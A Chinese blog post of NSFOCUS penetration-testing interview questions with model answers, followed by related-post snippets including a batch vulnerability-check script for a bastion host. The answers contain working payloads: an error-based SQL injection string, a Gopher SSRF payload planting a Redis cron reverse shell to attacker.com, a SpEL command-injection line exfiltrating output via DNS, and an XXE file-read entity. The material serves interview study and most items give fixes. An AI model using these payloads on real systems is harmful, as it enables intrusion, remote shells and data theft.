绿盟的面试题都这么难了?

已于 2025-03-09 15:32:47 修改
阅读量478 收藏 9
点赞数 13
文章标签: web安全 数据库 测试工具 安全 渗透测试
于 2025-03-09 15:26:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/persist213/article/details/146133024
版权

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

作为网络安全中的黄埔军校,绿盟科技25届应届生已经开始招聘了,全国应该陆续放出上千个岗位,但是不少小伙伴表示,目前拿到offer也只能是实习offer,至于能不能转正,要看最终的表现。

看表现看表现,这里不用多说吧,老司机应该都懂吧,这不就是HR的说辞么,毕竟春招实习生走了还有秋招实习生呢。这不就源源不断了。

但是绿盟作为老牌网络安全公司公司整体技术氛围还是不错的,如果大家能拿到机会也还是可以去冲一下的。同事我也把群里大家说问到的面试题整理了一份在xing球

绿盟简历投递的地址

来吧看看这几道题目你会不(更多面经在星哈)

题目1:某WAF拦截了UNION SELECTinformation_schema,如何获取数据库名?
答案

  • 替代information_schema:使用sys.schema_auto_increment_columns(MySQL 5.6+);

  • 绕过UNION:利用报错注入或布尔盲注;

  • Payload示例:

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

修复方案:使用ORM框架+参数化查询,禁用错误回显。

题目2:如何在Java反序列化漏洞中注入内存马(如Tomcat Filter型)?
答案

  1. 构造恶意Filter类:动态注册Filter,映射到/*路径;

  2. 利用反序列化链(如CC6)加载字节码(URLClassLoader或BCEL);

  3. 通过JRMP或HTTP服务传输恶意类;

  4. 触发Filter的doFilter方法执行命令。
    检测工具:Java内存马扫描工具(如scFox)。

题目3:某文件下载接口存在路径遍历漏洞(filename=../../etc/passwd),如何进一步利用实现RCE?
答案

  1. 查找Web根目录的可写路径(如/tmp、上传目录);

  2. 上传恶意文件(如JSP Webshell)到可写目录;

  3. 结合文件包含、反序列化等漏洞触发执行;

  4. 或覆盖敏感配置文件(如.htaccess)。
    修复方案:规范化路径,禁用动态文件名拼接。

题目4:某系统通过URL参数控制权限(如/admin?role=admin),如何绕过并访问管理后台?
答案

  • 参数污染:/admin?role=user&role=admin

  • 修改请求方法:GET改为POST或PUT;

  • 伪静态路径:/admin/../user/admin

  • HTTP头注入:X-Forwarded-For: 127.0.0.1
    修复方案:后端校验用户角色,而非依赖前端参数。

题目5:审计以下XML解析代码,指出漏洞及修复方案:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(input);  

答案

  • 漏洞:未禁用外部实体解析,导致XXE;

  • 利用:读取本地文件(<!ENTITY xxe SYSTEM "file:///etc/passwd">);

  • 修复

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

题目6:如何通过SSRF漏洞攻击内网Redis未授权访问?
答案

  1. 利用Gopher协议构造Redis命令:

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$30%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/443 0>&1%0a%0a%0a%0d%0aquit%0d%0a

  1. 写入定时任务或SSH密钥;
    修复方案:禁用非常用协议(如Gopher),限制请求目标IP。

题目7:某系统使用SpEL表达式处理用户输入,如何利用T(java.lang.Runtime).exec()实现无回显RCE?
答案

  • DNS外带数据

T(java.lang.Runtime).exec('curl ${urlencode("; whoami | xxd -p -c 32 | tr -d '\n' | xargs -I{} dig {}.attacker.com")}')

  • 修复方案:使用SimpleEvaluationContext替代StandardEvaluationContext

go_to_hacker
关注
绿盟科技面试题
WD_MX的博客
11-23 2967
绿盟科技面试
绿盟春招面试题
liguangyao213的博客
03-30 1322
正常SSH交互命令的包大小随机(几十到几百字节),隧道传输会出现固定块大小(如1024/4096字节的规律性载荷):某金融公司内网服务器发现异常SSH外联流量,会话持续时间长达12小时,但登录日志中无对应操作记录。:从SSH_MSG_USERAUTH_REQUEST数据包中提取用户名(如payload中的。:解密后载荷熵值接近8(加密数据),若熵值低于6可能为压缩文件(如tar.gz)传输。:某政府机构内网中,多台主机出现异常SMB流量,目标为DC服务器的445端口。列出3个关键流量特征。
绿盟面试题
liguangyao213的博客
03-20 808
如何利用Fastjson ≤1.2.24的反序列化漏洞实现RCE?给出利用链及限制条件。:在GitHub公开代码中发现某云厂商的AK/SK,如何快速验证并扩大攻击面?:如何利用Shiro的RememberMe功能实现反序列化攻击?:简述CVE-2022-22947的利用条件及攻击步骤。:使用ORM框架+参数化查询,禁用错误回显。:某登录系统存在SQL注入漏洞,但过滤了。关键字,如何绕过并获取管理员密码?5000篇网安资料库。,如何获取数据库名?
2015年绿盟面试题
GarfieldEr007的专栏
10-26 2342
霸面而来。。后来补做了半个小时左右的异地笔试试题。。 一面 1、自我介绍 2、函数重载(overloading)和覆盖(override)的区别是什么,它们的作用分别是什么? 3、说一下多态,说一下虚函数 4、 用过Linux吗,说几个命令吧 5、了解设计模式吗,用过吗 6、有没有做过正式的项目 7、其他问题想不起来了 二面 1、自我介绍 2、聊项目 3、对
绿盟安服实习面试
carrot11223的博客
12-27 1022
12.你现在大三对吧?如果你大四以你现在的情况其实可以争取校招。4.我看你有渗透测试基础,用sqlmap跑post参数怎么做?10.举个场景,客户明确告诉你,网站已经被入侵了,怎么去排查?8.weblogic之前出过反序列化漏洞,了解嘛?第8个问题没回答出来,说自己不知道。2. 我看你简历有些护网经历,是23年八月份那次嘛?6.除了bp,你自己做漏洞扫描的一些工具?7.ssrf这种漏洞你觉得能干什么?11.之前你自己有接触过代码审计嘛?5.nmap禁ping,你怎么办?3.你是通过什么途径参加的呢?
绿盟 java 面试_绿盟2013web实习生面试题
weixin_32024145的博客
02-24 244
1、limitn,mlimit 起始位置(0开始算),显示条数;上例:SELECT * FROM `test` limit n,m 他的起始位置写的是n,由于是从0开始算起的,而数据库中的id是从1开始的,所以自然真正的起始位置是n+1,后面的m代表显示m条记录。2、php连接数据库代码//mysql_connect(servername,use...
绿盟 java 面试_绿盟面试经验
weixin_39993322的博客
02-24 614
面试过程:接到面试通知,6号面试。这是一次技术面试,2对1形式,就是1个技术经理+1个hr对一个应聘者。那时侯已经将近7点了,hr对我说了好多个对不起,应该把我安排在前面,我笑着说“没事”。面试主要问些项目大致情况,工作量情况,对某些技术掌握程度等等,还有就是自己的职业规划以及期望薪水。虽然之前屡屡被教育期望薪水不要说具体数字,我还是说了个数字。面试完之后一周,正当我为没接到oracle笔试通知而...
绿盟渗透安全工程师校招面试
LINGOVO的博客
12-18 2055
绿盟渗透安全工程师校招面试 2020.11.17福州 oswap top10 注入 失效身份验证和会话管理 敏感信息泄露 XML外部实体注入攻击(XXE) 存取控制中断 安全性错误配置 跨站脚本攻击(XSS) 不安全的反序列化 使用具有已知漏洞的组件 日志记录和监控不足 1.xxe中文名 XML 外部实体注入 2.xxe怎么利用 XML中可以通过调用实体来请求本地或者远程内容,例如敏感文件读取 3.怎么知道哪里存在xxe漏洞 XML格式文件解析外部实体 4.xxe怎么读取文件 5.excel存在
面试题 | 超详细绿盟面试题问答来也!一通电话拿到的offer,还有谁!
jxiang213的博客
09-21 1324
正所谓师傅领进门,修行在个人,拼客学院正是充当了领路人的角色,他可以带领你如果更快,更准确地的进入网络与安全行业的门槛,自己去摸索可能要花大量的精力在搜索安全行业的相关资料或信息上,很没有方向。我便找了一位曾经在拼客学习的直系师兄了解了拼客,了解了当前安全行业的现状,了解了自己应该怎样去进入安全门槛,过了两天我便下了决定报班了。答:SQL注入可能存在的站点中的哪些功能模块可以说一下,如何测试的,手工的方式,burpsuite跑包的方式都可以说,最后我还补充了SQL注入神器sqlmap。
中联绿盟面试技术题 供参考
05-25
中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题...
【面经】2022社招软件测试面试(4)-绿盟科技+蒸汽记忆Authing
每天学习一点点,成长一小步
08-26 612
【面经】2022社招软件测试面试(4)-绿盟科技+蒸汽记忆Authing
系统与网络安全------Windows系统安全(8)
最新发布
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
04-03 231
DNS(域名系统)是互联网核心服务,通过分层分布式数据库将域名(如)解析为IP地址,实现设备寻址。采用客户端-服务器架构,包含根域名服务器、顶级域(TLD)服务器和权威域名服务器,支持递归/迭代查询。记录类型包括A(IPv4)、AAAA(IPv6)、MX(邮件交换)、CNAME(别名)等。默认使用UDP 53端口,依赖缓存机制提升效率。虽存在DNS劫持、污染等风险,但可通过DNSSEC(数字签名)增强安全性。
202年充电计划——自学手册 网络安全(黑客技术)
2401_85027424的博客
04-02 1116
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全与防护策略
菜鸟的专栏
04-02 953
网络安全(Cybersecurity)是指通过使用技术、管理和法律手段,保护计算机系统、网络、应用程序及数据免受未经授权的访问、使用、披露、破坏、修改或泄露。其主要目标是确保信息的机密性完整性和可用性。机密性(Confidentiality):确保数据只能被授权用户访问,防止数据泄露。完整性(Integrity):保证数据在存储、传输过程中不被篡改。可用性(Availability):确保合法用户可以随时访问和使用信息系统。
精心整理-2024最新网络安全-信息安全全套资料(学习路线、教程笔记、工具软件、面试文档).zip
goodxianping的专栏
03-29 518
5.4-网络安全基础-常见网站攻击方式概述-网站服务器运行缓慢、网络安全基础-被植入了蠕虫病毒.mp4。5.2-网络安全基础-常见网站攻击方式概述-网站的根目录中出现大量的植入网页.mp4。5.7-网络安全基础-常见网站攻击方式概述-网站的数据库被植入内容.mp4。13.4-渗透测试漏洞挖掘、漏洞扫描-渗透测试必备工具(下).mp4。13.3-渗透测试漏洞挖掘、漏洞扫描-渗透测试必备工具(中).mp4。13.2-渗透测试漏洞挖掘、漏洞扫描-渗透测试必备工具(上).mp4。
2025年三个月自学手册 网络安全(黑客技术)
2401_85027336的博客
03-26 2993
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
从入门到精通:SQL注入防御与攻防实战——红队如何突破,蓝队如何应对!
Aishenyanying33的博客
03-26 1289
SQL注入(SQL Injection)是最古老且最常见的Web应用漏洞之一。尽管很多公司和组织都已经采取了WAF、防火墙、数据库隔离等防护措施,但SQL注入依然在许多情况下能够突破防线,成为攻击者渗透内网、窃取敏感信息的重要手段。 本篇文章将深入剖析SQL注入攻击的全过程,详细讲解红队是如何突破现有防线的,并且为蓝队提供实战防御策略。通过真实场景案例,从简单到深入,帮助你一步步理解并掌握SQL注入防御的核心技术。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
03-31 384
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
绿盟怎么批量验证
03-13
<think>好的,我需要帮用户解决关于绿盟产品批量验证的使用方法和教程的问题。首先,我得查看用户提供的引用内容,特别是引用[3],里面提到了绿盟SAS堡垒机的远程命令执行漏洞和批量验证POC的使用方法。用户可能想知道如何利用绿盟的工具或产品进行类似的批量验证操作。 首先,我需要确认绿盟是否有官方的批量验证工具或功能。根据引用[3],用户可能已经有一个POC脚本,但需要指导如何使用。通常,批量验证可能涉及编写脚本来自动化测试多个目标,比如使用Python或者其他自动化工具。 接下来,我需要考虑绿盟产品的具体文档或指南。用户可能需要参考绿盟的官方文档,或者寻找社区提供的教程。引用[3]中的POC示例使用了Tscan验证工具,这可能是一个自定义脚本或工具。用户可能需要了解如何配置参数、路径、请求头等。 另外,用户可能需要了解绿盟SAS堡垒机的配置步骤,比如如何设置Exec路径和处理响应。例如,在引用[3]的POC中,路径是/webconf/Exec/index?cmd=id,请求方法为GET,并且检查响应状态和内容。用户需要确保他们的脚本能够正确发送请求并解析结果。 同时,安全测试需要权限,用户必须确保他们有权对目标系统进行测试,避免未经授权的访问。此外,绿盟可能提供了一些安全工具或API,用户需要查阅相关文档来集成批量验证功能。 最后,我应该建议用户参考绿盟的官方支持或社区论坛,以获取最新的工具和教程。如果有具体的产品名称,如绿盟SAS堡垒机,应指导用户查找该产品的用户手册或安全指南中的批量验证部分。</think>关于绿盟产品批量验证的使用方法,根据提供的漏洞验证案例[^3],以下是分步骤说明: 1. **准备工作环境** - 安装Python环境(建议3.6+版本) - 配置Tscan等漏洞验证工具 - 准备目标IP列表文件(如`targets.txt`) 2. **解析POC验证模板**(以绿盟SAS堡垒机漏洞为例) ```yaml rules: method: GET path: /webconf/Exec/index?cmd=id # 关键漏洞触发路径 headers: Content-Type: application/x-www-form-urlencoded expression: response.status == 200 && response.body.contains("WEBSVC OK") # 漏洞特征判断 ``` 3. **构建批量验证脚本框架** ```python import requests def check_vuln(ip): try: url = f"http://{ip}/webconf/Exec/index?cmd=id" response = requests.get(url, timeout=5) if response.status_code == 200 and "WEBSVC OK" in response.text: return True except Exception as e: return False return False ``` 4. **实施批量验证** - 遍历IP列表文件 - 多线程加速检测(建议控制并发量) - 输出存在漏洞的目标列表 **注意事项**: - 必须获得合法授权后才可进行验证[^3] - 绿盟产品存在防护机制,高频请求可能触发封禁 - 验证前建议在隔离环境测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值